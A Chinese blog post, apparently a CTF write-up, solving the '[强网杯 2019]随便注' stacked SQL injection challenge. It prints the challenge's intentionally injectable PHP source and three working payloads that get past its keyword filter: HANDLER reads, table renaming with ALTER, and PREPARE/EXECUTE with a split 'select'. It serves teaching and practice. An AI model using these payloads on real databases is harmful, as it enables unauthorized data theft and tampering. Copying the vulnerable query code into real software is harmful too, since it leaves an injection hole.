堆叠注入之[强网杯 2019]随便注

最新推荐文章于 2024-07-29 22:50:36 发布
最新推荐文章于 2024-07-29 22:50:36 发布
阅读量693 收藏 6
点赞数 3
文章标签: php web安全
Aiwin
本文链接:https://blog.csdn.net/weixin_53090346/article/details/124992433
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

前言

作为CTF小白,在各大平台做基础题的时候,都能见到[强网杯 2019]随便注,自己也做了不少于三遍,今天又碰到了,觉着这道题属实比较特别。因此,总结一下这道题

进入页面

 先按常理出牌

发现正则匹配过滤了select,update,delete,drop,insert,where。首先想到可以使用报错注入,但是过滤了select似乎查询不了表和字段名。实际上这道题为堆叠注入,直接看题目的源代码。

 

<?php
function waf1($inject) {
    preg_match("/select|update|delete|drop|insert|where|\./i",$inject) && die('return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);');
}
function waf2($inject) {
    strstr($inject, "set") && strstr($inject, "prepare") && die('strstr($inject, "set") && strstr($inject, "prepare")');
}
if(isset($_GET['inject'])) {
    $id = $_GET['inject'];
    waf1($id);
    waf2($id);
    $mysqli = new mysqli("127.0.0.1","root","root","supersqli");
    $sql = "select * from `words` where id = '$id';";
    $res = $mysqli->multi_query($sql);
    if ($res){
      do{
        if ($rs = $mysqli->store_result()){
          while ($row = $rs->fetch_row()){
            var_dump($row);
            echo "<br>";
          }
          $rs->Close(); 
          if ($mysqli->more_results()){  
            echo "<hr>";
          }
        }
      }while($mysqli->next_result()); 
    } else {
      echo "error ".$mysqli->errno." : ".$mysqli->error;
    }
    $mysqli->close();  
}
?>

分析源代码:

1,使用了multi_query()函数,可以执行多条sql语句。

2,查询语句为 $sql=select *from `words` where id=$id;

3,通过store_result()获取第一条sql语句查询结果,通过var_dump()输出,然后通过more_results()判断是否有更多的结果集,用next_result()方法获取下一个结果集继续输出。

题目的三种解法:

1,首先通过堆叠注入可以查询出存在那些表。1';show tables;#

2,然后查询表中的字段名。可以通过 show columns from `表名`; 或 desc `表名`;查询。

反引号?反引号的使用是为了区分mysql的保留字符与普通字符而引入的;例如在出现字段名与保留关键字相同、标识中含空格等等情况下就需要使用,否则可能出错。

 

第一种解: 

由于select被禁了,可以使用handler代替select。

1';handler  `1919810931114514` open as a;handler a read first;handler a close;#

payload就是使用handler打开1919810931114514表的句柄,然后读取句柄的第一行即flag的值,然后关闭。

 解法二:

通过源代码可以知道图中查询语句是$sql=select *from `words` where id=$id;从名为words的表中查询id=$id的值并返回。

1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

payload意思就是将原本words的名称改掉,然后把表1919810931114514改成words,并且把表1919810931114514的字段flag改成id,这样查询就变成了 select *from `1919810931114514` where flag=$id。就可以查询出flag

解法三:

 

-1';Set @sql = CONCAT('se','lect * from `1919810931114514`;');Prepare flag from @sql;EXECUTE flag;#
  • PREPARE - 准备执行的声明。
  • EXECUTE - 执行由PREPARE语句定义的语句。
  • DEALLOCATE PREPARE - 发布PREPARE语句。

设置一个声明查询语句select *from 表19,使用CONCAT连接select绕过select,然后EXECUTE执行声明返回结果。

 总结

sql注入,总有很多骚姿势,只有你想不到的。

M03-Aiwin
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
防xss攻击和sql注入正则
weixin_43863000的博客
03-18 1072
static function request_filter($data){ if(is_array($data)){ foreach($data as $key=>$v){ $data[$key] = self::request_filter($data[$key]); } }else{ if(strlen($data)){ $fil
SQL Injection8(堆叠注入)——强网杯2019随便
热门推荐
kid的博客
05-28 1万+
SQL Injection8(堆叠注入)——强网杯2019随便 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便是一道sql注入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠注入的知识,堆叠注入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠注入原理 在SQL中,...
堆叠注入-强网杯2019随便
生死看淡,不服就干的博客
03-11 392
靶场地址 链接(click me) 发现很友情的提示,emmm,那就先使用不同的 payload 进行测试,看下结果吧 直接点击提交,看结果,输出为一个数组,此处应有文章可做,再测试其他payload试试 使用 1’ # 看结果,给出以下错误提示信息,因此可初步判断存在闭合 使用 payload:1’ order by 3 # 测试列数,经测试发现有2列,尝试回显注入 使用 payload:1’ union select 1,2 # 注入,发现被过滤,大小写也没用,正则忽略大小写,大.
buuctf web题解之[强网杯 2019]随便1详解
2301_77451464的博客
01-29 1035
目录一、用到的知识点二、堆叠注入的原理1.先看是字符型还是数字型2.查看注入点3.接下来就是查看闭合方式4.再测试字段数,二分法,一点一点试,最后测试出来为25、联合查询,发现select|update|delete|drop|insert|where包括大小写等操作被过滤6.先通过show databases爆出数据库7.然后用 show tables 爆表8.可以看到这里有两个表,我们先尝试爆words表的内容9.爆1919810931114514数据表字段(意数据表为数字的时候需要用反引号括起来)1
强网杯 2019-随便 (堆叠注入)
开心星人的博客
08-07 2762
我们通过rename或alter,就是把words表改成words1或者其他名字,然后把数字表名改成words,然后在把新的words里面的flag字段名称修改成id。我们查看数字表,反单引号(`)是数据库、表、索引、列和别名用的引用符,如果是纯数字的表就需要加反单引号,如果不是就不需要加或者加上也无所谓。发现过滤了很多关键字,所以不可以用union注入了。同样报错注入也是用不了的,因为报错注入的语句和union注入的语句相同。看到words表中的字段,我们发现底层的sql语句就是直接查询的words表。.
[强网杯 2019]随便 1-堆叠注入
qq_43564182的博客
07-10 531
解题 0x01 堆叠注入学习(堆叠查询,Stacked Queries) 堆叠注入为攻击者提供了很多控制权,与仅限于SELECT语句的UNION联合查询攻击不同,堆叠注入可以用于执行任何SQL语句。 堆叠注入原理 在sql中,分号表示一条语句的结束。如果在分号的后面再加一条语句,这条语句也可以被执行,继续加一个分号和一条语句,这样就可以在一次数据库的调用中执行多个语句。 举个堆叠注入攻击的例子 执行查询时,第一个语句执行信息查询,第二个语句则将表user的所有内容给删除了。 mysql> select
BUUCTF -web- [强网杯 2019]随便
qq_44640313的博客
12-14 2485
以buuctf的强网杯2019为例的堆叠注入
SQL注入堆叠注入-强网杯[随便]
qq_68163788的博客
02-22 1116
堆叠注入是指攻击者在SQL注入攻击中利用多个查询语句的堆叠,从而绕过应用程序的输入验证,进而执行恶意的SQL代码。攻击者可以通过在输入参数中插入分号或者其他分隔符,使得应用程序在执行SQL查询时将恶意代码与原有查询语句堆叠在一起,从而绕过输入验证,执行恶意代码。 堆叠注入攻击可以导致严重的安全问题,包括数据泄露、数据篡改甚至数据库服务器的完全控制。为了防止堆叠注入攻击,开发人员应该采取一系列安全措施,包括对输入参数进行严格的验证和过滤,使用参数化查询等安全措施来防止SQL注入攻击的发生。
[强网杯 2019]随便 —— 堆叠注入
weixin_46962006的博客
12-12 2464
                       [强网杯 2019]随便 1 前言        个人观点,若有误请指教 解题思路及步骤 直接上’引号,结果直接报错了,证明存在sql注入漏洞。 判断当前表一共有几列,可得一共两列 获得当前表的内容,很明显当前表没有flag :是不是很蒙?竟然可以直接获得当前表的内容,那我干嘛还要在上面测试表有多少列?其实不是的,你在网页看到一共有几列就证明在数据库中的当前表就只有几列吗?就不能少几列给你看?当然,这道确实显示的列数和在数据库的当前表
【BUUCTF】web强网杯2019随便
12-14
看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里意表名为数字的要加反引号 “ ...
[强网杯 2019]随便.docx
12-18
强网杯 2019】SQL 注入详解 SQL 注入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 注入题目。首先,通过尝试...
提高网络健壮性必杀技之——堆叠.doc
01-20
提高网络健壮性必杀技之——堆叠 堆叠是一种提高网络健壮性的技术,通过将多个网络设备或系统连接在一起,以提高网络的可靠性和冗余性。这种技术广泛应用于各种网络环境中,如数据中心、企业网络、电信网络等。 在...
堆叠图_echarts_柱状堆叠图_
09-29
在这个场景中,我们关的是“堆叠图”和“柱状堆叠图”,这是ECharts中用于展现多组数据相互叠加效果的图表类型。这种图表可以有效地展示不同类别在总值中的占比,以及各个类别之间的相对关系。 堆叠图(Stacked ...
iOS实现卡片堆叠效果
08-19
iOS实现卡片堆叠效果 iOS实现卡片堆叠效果是指在iOS平台上实现类似于安卓5.0的Material Design设计语言中的卡片堆叠效果,通过巧妙地使用UIScrollView和Core Animation来实现卡片的堆叠和缩放效果。下面是对该效果...
这款ERP云进销存系统,直接封神
魔法标记
07-29 467
一套用php写的ERP云进销存系统,快速部署,直接使用,简直是小公司和个体户的神器。
WordPress原创插件:搜索引擎抓取首图seo图片
最新发布
爱酷码的博客
07-29 292
WordPress原创插件:搜索引擎抓取首图seo图片。
PHP框架详解 - symfony框架
丁爸的博客
07-28 793
Symphony框架是一个功能强大、稳定可靠、易于扩展和定制的开源Web框架,适用于构建各种类型的Web应用程序。虽然在某些情况下可能会遇到一些性能和学习曲线的挑战,但是通过合理的配置和优化,以及积极的学习和实践,可以充分发挥Symphony框架的优势,构建高质量的Web应用程序。Symphony框架是一个基于PHP的开源Web框架,它提供了一套丰富的组件和工具,可以帮助开发者更轻松地构建高质量的Web应用程序。
c++语言实现类似swoole扩展的项目实践
北风之神Boreas
07-24 416
项目本质其实是C++项目开发,学员学习后增加对C++技术栈的实践能力,毕竟互联网的核心基石依然是C/C++。 当你要改变以前吸收的知识来源于国内视频教程,国内文章教程 国内文章资料 转向全球老外大佬云集的github开源项目吸收时,就要学C和C++ 而你以前的IT技术就是国内的教程 国内的社区 国内的文章 ,但都是有局限的,所以要转向github社区吸收开源项目的东西来增强个人技术体系。 技术只来源于实践,不是光看,光记就会的东西,纸上得来终觉浅绝知此事要躬行。
sqlmap 堆叠注入
08-17
堆叠注入是一种利用数据库查询语句的漏洞进行攻击的技术。SQLMap是一个常用的自动化SQL注入工具,它可以用来检测和利用堆叠注入漏洞。 堆叠注入是通过将多个SQL语句连接在一起执行,从而绕过输入过滤和参数绑定等安全机制。攻击者可以通过构造恶意的输入来执行任意的SQL语句,例如插入、更新或删除数据,甚至执行系统命令。 使用SQLMap可以自动化地检测和利用堆叠注入漏洞。它具有强大的功能,可以自动发现目标网站的注入点,并进行注入测试。你可以通过指定目标URL、注入类型和其他参数来配置SQLMap的运行。 然而,请意,堆叠注入是一种非常危险的漏洞攻击技术,对于未经授权的测试或攻击是违法的。在进行任何安全测试之前,请确保已经获得了合法的授权,并且仅在合法的测试环境中进行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M03-Aiwin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值